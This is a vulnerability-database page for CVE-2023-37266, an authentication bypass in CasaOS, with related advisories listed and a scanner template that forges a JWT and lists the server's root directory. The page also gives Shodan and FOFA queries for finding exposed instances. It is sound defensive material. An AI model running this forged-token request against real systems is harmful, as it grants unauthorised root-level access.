| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| The vulnerability of the JWT Secret Handler component in the cloud operating system CasaOS allows a attacker to execute arbitrary commands with root privileges. | 25 Oct 202300:00 | – | bdu_fstec | |
| CVE-2023-37266 | 18 Jul 202300:45 | – | circl | |
| CasaOS 授权问题漏洞 | 17 Jul 202300:00 | – | cnnvd | |
| CasaOS Encryption Issues Vulnerabilities | 19 Jul 202300:00 | – | cnvd | |
| CVE-2023-37266 | 17 Jul 202320:57 | – | cve | |
| CVE-2023-37266 Weak json web token (JWT) secrets in CasaOS | 17 Jul 202320:57 | – | cvelist | |
| CasaOS contains weak JWT secrets | 17 Jul 202314:40 | – | github | |
| CasaOS contains weak JWT secrets | 17 Jul 202300:00 | – | gitlab | |
| CVE-2023-37266 | 17 Jul 202321:15 | – | nvd | |
| CVE-2023-37266 Weak json web token (JWT) secrets in CasaOS | 17 Jul 202320:57 | – | osv |
id: CVE-2023-37266
info:
name: CasaOS < 0.4.4 - Authentication Bypass via Random JWT Token
author: iamnoooob,DhiyaneshDK,pdresearch
severity: critical
description: |
CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.
impact: |
Successful exploitation allows unauthorized access to the CasaOS system.
remediation: The problem was addressed by improving the validation of JWTs in 705bf1f. This patch is part of CasaOS 0.4.4.
reference:
- https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad
- https://github.com/IceWhaleTech/CasaOS/security/advisories/GHSA-m5q5-8mfw-p2hr
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-37266
cwe-id: CWE-287
epss-score: 0.05871
epss-percentile: 0.92316
cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: icewhale
product: casaos
shodan-query:
- http.html:"/CasaOS-UI/public/index.html"
- http.html:"/casaos-ui/public/index.html"
fofa-query:
- body="/CasaOS-UI/public/index.html"
- body="/casaos-ui/public/index.html"
tags: cve2023,cve,oss,casaos,jwt,icewhale,vuln
variables:
jwt_data: '{"iss":"casaos","exp":1790210322,"nbf":1790199522,"iat":1790199522}'
jwt_token: '{{generate_jwt(jwt_data, "HS256")}}'
http:
- method: GET
path:
- "{{BaseURL}}/v1/folder?path=%2F"
headers:
Authorization: '{{jwt_token}}'
matchers:
- type: word
words:
- '"success":200'
- '"message":"ok"'
- 'content'
- 'is_dir'
condition: and
extractors:
- type: json
json:
- .data.content[].path
# digest: 490a0046304402205f4e93592f9c8f27a71f894ec7c38f89d087a61e7cd4116be36618693253cfcf02203fbfb7594c682d94d7846933b341c10535252f9cdad97b1e6c5e9acb05470588:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation